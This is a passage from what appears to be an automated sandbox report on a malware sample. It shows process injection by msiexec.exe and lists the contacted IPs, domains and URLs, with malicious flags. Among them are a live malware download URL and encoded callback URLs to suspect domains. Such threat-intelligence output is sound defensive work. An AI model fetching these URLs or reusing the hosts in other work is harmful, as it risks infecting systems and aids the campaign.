injected process13 dnsIp14 48 travelgleam.com 162.210.195.97, 49166, 80 LEASEWEB-USA-WDCUS United States 25->48 50 192.168.2.22, 49165, 49166, 49168 unknown unknown 25->50 52 4 other IPs or domains 25->52 76 System process connects to network (likely due to code injection or exploit) 25->76 29 msiexec.exe 25->29         started        signatures15 process16 signatures17 80 Modifies the context of a thread in another process (thread injection) 29->80 82 Maps a DLL or memory area into another process 29->82 32 cmd.exe 29->32         started        process18
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
107.173.191.75
 unknown United States
36352 AS-COLOCROSSINGUS false
162.210.195.97
 travelgleam.com United States
30633 LEASEWEB-USA-WDCUS true

Private
IP
192.168.2.22
192.168.2.255

Contacted Domains

Name IP Active
minisite.alibaba.com.gds.alibabadns.com 47.246.136.142 true
travelgleam.com 162.210.195.97 true
www.sdffzc.com unknown unknown
www.travelgleam.com unknown unknown
www.subsoilcorp.com unknown unknown
www.ll1ysq.biz unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.sdffzc.com/hf9j/?LnftM=Pqr9SePoNfnaC1kg2G0jCGwXX1ba57NV0gLvpt/5y4PrrRm7oBIm/XhJEBzYJkmjKkGOCg==&NnwLW=lTeXzRfHoPHDqpa true
  • Avira URL Cloud: safe
 unknown
http://107.173.191.75/dodge/winlogon.exe true
  • Avira URL Cloud: malware
 unknown
www.dubaibiologicdentist.com/hf9j/ true
  • Avira URL Cloud: safe
 low
http://www.travelgleam.com/hf9j/?NnwLW=lTeXzRfHoPHDqpa&LnftM=Hi4i/MzZWraYpeia3tFw/razG0ol5F63XlO+NDDVDOKGXMifKzAuqwSCBSP91u5pGStR7A== true
  • Avira URL Cloud: safe
 unknown